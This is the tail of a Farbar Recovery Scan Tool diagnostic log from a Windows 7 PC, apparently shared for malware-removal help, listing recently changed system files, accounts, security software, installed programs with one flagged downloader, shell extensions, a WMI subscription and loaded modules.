2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:05 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2019-07-09 19:06 - 2019-06-12 10:04 - 000023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2019-07-09 19:06 - 2019-06-12 10:01 - 000663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2019-07-09 19:06 - 2019-06-12 09:55 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sscore.dll
2019-07-09 19:06 - 2019-06-12 09:54 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2019-07-09 19:06 - 2019-06-12 09:50 - 000055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2019-07-09 19:06 - 2019-06-12 09:49 - 000205312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Dism.exe
2019-07-09 19:06 - 2019-06-12 09:49 - 000125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2019-07-09 19:06 - 2019-06-12 09:49 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2019-07-09 19:06 - 2019-06-12 09:48 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2019-07-09 19:06 - 2019-06-12 09:48 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2019-07-09 19:06 - 2019-06-12 09:48 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2019-07-09 19:06 - 2019-06-12 09:48 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2019-07-09 19:06 - 2019-06-12 09:47 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2019-07-09 19:06 - 2019-06-12 09:46 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 09:46 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 09:46 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 09:46 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 09:42 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2019-07-09 19:06 - 2019-06-12 09:42 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2019-07-09 19:06 - 2019-06-12 09:42 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2019-07-09 19:06 - 2019-06-12 09:42 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2019-07-09 19:06 - 2019-06-12 09:39 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2019-07-09 19:06 - 2019-06-12 09:39 - 000129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\videoprt.sys
2019-07-09 19:06 - 2019-06-12 09:38 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2019-07-09 19:06 - 2019-06-12 09:37 - 000274944 _____ (Microsoft Corporation) C:\Windows\system32\Dism.exe
2019-07-09 19:06 - 2019-06-12 09:37 - 000011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe
2019-07-09 19:06 - 2019-06-12 09:37 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2019-07-09 19:06 - 2019-06-12 09:36 - 000464384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2019-07-09 19:06 - 2019-06-12 09:36 - 000406016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2019-07-09 19:06 - 2019-06-12 09:36 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2019-07-09 19:06 - 2019-06-12 09:36 - 000169472 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2019-07-09 19:06 - 2019-06-12 09:36 - 000160768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2019-07-09 19:06 - 2019-06-12 09:36 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2019-07-09 19:06 - 2019-06-12 09:35 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000044544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\npfs.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2019-07-09 19:06 - 2019-06-10 21:59 - 002863104 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2019-07-09 19:06 - 2019-06-10 21:59 - 001712640 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000801792 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000634368 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000501760 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000456192 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000315904 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000257024 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2019-07-09 19:06 - 2019-06-09 10:20 - 003229184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2019-07-09 19:06 - 2019-06-09 10:19 - 000131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2019-07-09 19:06 - 2019-06-09 10:08 - 003730432 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2019-07-09 19:06 - 2019-06-09 10:08 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2019-07-09 19:06 - 2019-06-09 10:07 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2019-07-09 19:06 - 2019-06-09 10:04 - 001053184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2019-07-09 19:06 - 2019-06-09 10:04 - 000036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2019-07-09 19:06 - 2019-06-09 09:49 - 001120768 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2019-07-09 19:06 - 2019-06-09 09:49 - 000249344 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2019-07-09 19:06 - 2019-06-07 10:18 - 001425920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2019-07-09 19:06 - 2019-06-07 10:18 - 000026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleres.dll
2019-07-09 19:06 - 2019-06-07 10:08 - 002072576 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2019-07-09 19:06 - 2019-06-07 10:08 - 000516096 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2019-07-09 19:06 - 2019-06-07 10:08 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\oleres.dll
2019-07-09 19:06 - 2019-06-07 10:07 - 000008704 _____ (Microsoft Corporation) C:\Windows\system32\comcat.dll
2019-07-09 19:06 - 2019-06-07 09:55 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comcat.dll
 
==================== One month (modified) ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-07-25 18:29 - 2016-11-21 21:00 - 000000000 ____D C:\Users\richard\AppData\Local\2b9a
2019-07-25 18:04 - 2013-03-13 21:45 - 000000000 ____D C:\ProgramData\WRData
2019-07-25 15:04 - 2009-07-13 23:45 - 000028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-07-25 15:04 - 2009-07-13 23:45 - 000028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-07-25 14:53 - 2013-03-13 21:45 - 000181536 _____ (Webroot) C:\Windows\SysWOW64\WRusr.dll
2019-07-25 14:53 - 2013-03-13 21:45 - 000112480 _____ (Webroot) C:\Windows\system32\WRusr.dll
2019-07-25 14:53 - 2013-03-13 21:45 - 000000747 _____ C:\Users\Public\Desktop\Webroot SecureAnywhere.lnk
2019-07-25 14:53 - 2009-07-14 00:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-07-24 22:23 - 2016-11-16 22:48 - 000000000 ____D C:\Users\richard\AppData\LocalLow\Mozilla
2019-07-22 13:33 - 2013-03-13 19:53 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-07-21 15:27 - 2016-10-09 15:42 - 000000000 ____D C:\Users\richard\AppData\Roaming\ed4b
2019-07-21 15:27 - 2016-10-09 15:42 - 000000000 ____D C:\Users\richard\AppData\Local\d3e1
2019-07-20 18:02 - 2016-08-27 11:37 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-07-19 11:39 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\inf
2019-07-18 19:07 - 2009-07-13 23:45 - 000410904 _____ C:\Windows\system32\FNTCACHE.DAT
2019-07-17 08:41 - 2013-03-13 19:42 - 000108816 _____ C:\Users\richard\AppData\Local\GDIPFONTCACHEV1.DAT
2019-07-17 08:34 - 2014-09-20 23:21 - 000000000 ____D C:\Windows\Minidump
2019-07-17 08:25 - 2013-12-21 18:46 - 000002224 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-07-17 08:25 - 2013-12-21 18:46 - 000002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-07-17 08:11 - 2013-03-13 21:45 - 000000000 ____D C:\Program Files\Webroot
2019-07-14 20:21 - 2014-09-21 12:01 - 000000000 ____D C:\Users\richard\AppData\Local\Adobe
2019-07-14 11:48 - 2016-09-04 04:48 - 000000000 ____D C:\Users\richard\AppData\Roaming\vlc
2019-07-10 22:44 - 2013-08-15 00:44 - 000000000 ____D C:\Windows\system32\MRT
2019-07-10 06:23 - 2014-02-26 04:01 - 000774632 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2019-07-10 06:23 - 2009-07-14 00:13 - 000774632 _____ C:\Windows\system32\PerfStringBackup.INI
2019-07-10 04:32 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\rescache
2019-07-10 03:23 - 2014-12-10 07:36 - 000000000 ____D C:\Windows\system32\appraiser
2019-07-10 03:23 - 2014-05-06 03:00 - 000000000 ___SD C:\Windows\system32\CompatTel
2019-07-10 03:23 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\SysWOW64\Dism
2019-07-10 03:23 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\system32\Dism
2019-07-10 03:01 - 2012-02-16 16:49 - 136618864 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2019-07-09 15:05 - 2010-11-20 22:27 - 000741432 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
 
==================== SigCheck ===============================
 
(There is no automatic fix for files that do not pass verification.)
 
 
LastRegBack: 2019-07-22 14:36
==================== End of FRST.txt ============================
 
Addition log
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-07-2019 01
Ran by [removed] (25-07-2019 20:13:48)
Running from C:\Users\[removed]\Desktop\whatthetech
Windows 7 Home Premium Service Pack 1 (X64) (2013-03-14 00:42:13)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-441904776-594677368-125994074-500 - Administrator - Disabled)
Guest (S-1-5-21-441904776-594677368-125994074-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-441904776-594677368-125994074-1002 - Limited - Enabled)
richard (S-1-5-21-441904776-594677368-125994074-1001 - Administrator - Enabled) => C:\Users\richard
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AV: Webroot SecureAnywhere (Enabled - Up to date) {DF901FA1-F926-253B-C464-B01C79DCAD48}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Webroot SecureAnywhere (Enabled - Up to date) {64F1FE45-DF1C-2AB5-FED4-8B6E025BE7F5}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe Acrobat Reader DC (HKLM-x32\…\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 19.012.20035 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\…\Adobe AIR) (Version: 21.0.0.215 - Adobe Systems Incorporated)
Adobe Flash Player 22 ActiveX (HKLM-x32\…\{316462DB-82C6-4856-BA1F-2FDFDC08799F}) (Version: 22.0.0.210 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\…\Adobe Flash Player NPAPI) (Version: 32.0.0.207 - Adobe)
AMD Catalyst Install Manager (HKLM\…\{53A19094-2C04-A9B9-7309-3E92152D4845}) (Version: 8.0.903.0 - Advanced Micro Devices, Inc.)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\…\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.14.3.0 - Asmedia Technology)
Asmedia ASM106x SATA Host Controller Driver (HKLM-x32\…\{61942EF5-2CD8-47D4-869C-2E9A8BB085F1}) (Version: 1.3.4.000 - Asmedia Technology)
Canon Easy-PhotoPrint EX (HKLM-x32\…\Easy-PhotoPrint EX) (Version:  - )
Canon MG2100 series MP Drivers (HKLM\…\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG2100_series) (Version:  - )
Canon MG2100 series On-screen Manual (HKLM-x32\…\Canon MG2100 series On-screen Manual) (Version:  - )
Canon MG2100 series User Registration (HKLM-x32\…\Canon MG2100 series User Registration) (Version:  - )
Canon MP Navigator EX 5.0 (HKLM-x32\…\MP Navigator EX 5.0) (Version:  - )
Canon My Printer (HKLM-x32\…\CanonMyPrinter) (Version:  - )
Canon Solution Menu EX (HKLM-x32\…\CanonSolutionMenuEX) (Version:  - )
CCleaner (HKLM\…\CCleaner) (Version: 5.21 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\…\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\…\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\…\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Facebook Gameroom 1.21.6876.32656 (HKLM-x32\…\{A94D2051-8788-491C-801D-3965026D2718}) (Version: 1.21.6876.32656 - Facebook)
Fitbit Connect (HKLM-x32\…\{9EC69368-C1C7-48BA-AD93-01EFC142DDF9}) (Version: 2.0.0.6630 - Fitbit Inc.)
Futuremark SystemInfo (HKLM-x32\…\{BEE64C14-BEF1-4610-8A68-A16EAA47B882}) (Version: 4.0.0.0 - Futuremark Corporation)
GameSpy Arcade (HKLM-x32\…\GameSpy Arcade) (Version:  - )
Google Chrome (HKLM-x32\…\Google Chrome) (Version: 75.0.3770.142 - Google LLC)
Google Update Helper (HKLM-x32\…\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Google Update Helper (HKLM-x32\…\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Intel(R) Control Center (HKLM-x32\…\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\…\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Network Connections 17.3.63.0 (HKLM\…\PROSetDX) (Version: 17.3.63.0 - Intel)
Intel(R) Rapid Storage Technology (HKLM-x32\…\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\…\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.5.235 - Intel Corporation)
Junk Mail filter update (HKLM-x32\…\{8E5233E1-7495-44FB-8DEB-4BE906D59619}) (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Malwarebytes version 3.8.3.2965 (HKLM\…\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes)
Microsoft .NET Framework 4.7.2 (HKLM\…\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\…\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2010 (HKLM-x32\…\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\…\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM-x32\…\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\…\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\…\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\…\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\…\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\…\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\…\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\…\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\…\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\…\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\…\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\…\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Mozilla Firefox 68.0.1 (x64 en-US) (HKLM\…\Mozilla Firefox 68.0.1 (x64 en-US)) (Version: 68.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\…\MozillaMaintenanceService) (Version: 68.0.1.7137 - Mozilla)
MTGArena (HKLM-x32\…\{A8AFE495-9759-494A-9537-BDAD5B3B52F2}) (Version: 0.1.879.0 - Wizards of the Coast)
Open Downloader Manager (HKLM-x32\…\OpenDownloaderManager) (Version:  - Installer Technology Co) <==== ATTENTION
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\…\{7D916FA5-DAE9-4A25-B089-655C70EAF607}) (Version: 3.0 - Qualcomm Atheros)
Ralink RT2860 Wireless LAN Card (HKLM-x32\…\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 1.5.12.0 - Ralink)
Realtek High Definition Audio Driver (HKLM-x32\…\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6699 - Realtek Semiconductor Corp.)
Revo Uninstaller Pro 3.1.6 (HKLM\…\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.6 - VS Revo Group, Ltd.)
RogueKiller version 13.3.2.0 (HKLM\…\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 13.3.2.0 - Adlice Software)
SAMSUNG USB Driver for Mobile Phones (HKLM\…\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.9.0 - SAMSUNG Electronics Co., Ltd.)
Secunia PSI (3.0.0.11005) (HKLM-x32\…\Secunia PSI) (Version: 3.0.0.11005 - Secunia)
UnZipper 1.0.0 (HKLM-x32\…\UnZipper) (Version: 1.0.0 - UnZipper)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\…\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Verizon Wireless Software Upgrade Assistant - Samsung(ar) (HKLM-x32\…\{FD1408CA-47E3-45C8-B7CB-75AEB8F98DA1}) (Version: 2.13.0273 - Samsung Electronics Co., Ltd.)
Verizon Wireless Software Utility Application for Android - Samsung (HKLM-x32\…\{D3D2A5FF-55C2-4A5A-BDAC-A502A66E6B8D}) (Version: 2.13.0246 - Samsung Electronics Co., Ltd.)
VLC media player (HKLM-x32\…\VLC media player) (Version: 2.2.6 - VideoLAN)
Webroot SecureAnywhere (HKLM-x32\…\WRUNINST) (Version: 9.0.26.61 - Webroot)
Windows Live Essentials (HKLM-x32\…\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Sign-in Assistant (HKLM-x32\…\{45338B07-A236-4270-9A77-EBB4115517B5}) (Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\…\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\…\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
ContextMenuHandlers1: [FileAssociationHelper] -> {D5CF14A2-B3CA-49DC-8E3E-0BB233B26D09} => C:\Program Files\File Association Helper\FAHDll.dll [2014-01-28] (WinZip Computing LLC -> Nico Mak Computing)
ContextMenuHandlers1-x32: [UnZipper] -> {73950f91-2061-4ea3-8bd5-49ec4bf08ac2} => C:\Program Files (x86)\UnZipper\UnZipper.dll [2015-11-04] (Tightrope Interactive) [File not signed]
ContextMenuHandlers1: [WRShellExt] -> {69D72956-317C-44bd-B369-8E44D4EF9802} => C:\Windows\system32\WRusr.dll [2019-07-25] (Webroot Inc. -> Webroot)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4-x32: [UnZipper] -> {73950f91-2061-4ea3-8bd5-49ec4bf08ac2} => C:\Program Files (x86)\UnZipper\UnZipper.dll [2015-11-04] (Tightrope Interactive) [File not signed]
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2012-12-19] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group -> VS Revo Group)
ContextMenuHandlers6: [WRShellExt] -> {69D72956-317C-44bd-B369-8E44D4EF9802} => C:\Windows\system32\WRusr.dll [2019-07-25] (Webroot Inc. -> Webroot)
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
 
Shortcut: C:\Users\richard\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co
 
==================== Loaded Modules (Whitelisted) ==============
 
2013-03-04 06:37 - 2012-02-01 19:25 - 000059904 _____ () [File not signed] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2019-05-15 03:48 - 2019-05-15 03:48 - 000172032 _____ () [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\023b2e749844720d94fa9a591cebbd78\IsdiInterop.ni.dll
2013-03-04 06:36 - 2012-03-31 00:53 - 000114688 ____N (Atheros Communications, Inc.) [File not signed] C:\Program Files (x86)\Qualcomm Atheros WiFi Driver Installation\AthIhvWlanExt.dll
2013-03-04 06:36 - 2012-03-31 00:53 - 000269824 ____N (Atheros Communications, Inc.) [File not signed] c:\program files (x86)\qualcomm atheros wifi driver installation\athihvwpap2p.dll
2013-03-17 15:20 - 2012-03-14 08:00 - 000030208 _____ (CANON INC.) [File not signed] C:\Windows\system32\spool\PRTPROCS\x64\CNMPDAQ.DLL
2015-09-04 16:43 - 2015-09-04 16:43 - 005750440 ____R (Fitbit, Inc. -> Fitbit, Inc.) [File not signed] C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
2019-05-15 03:48 - 2019-05-15 03:48 - 000014336 _____ (Intel Corp.) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorCommon\6dfb43a93bf06432c5ba0b7a8973197c\IAStorCommon.ni.dll
2013-03-04 06:37 - 2012-02-01 19:17 - 000278016 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\ISDI.dll
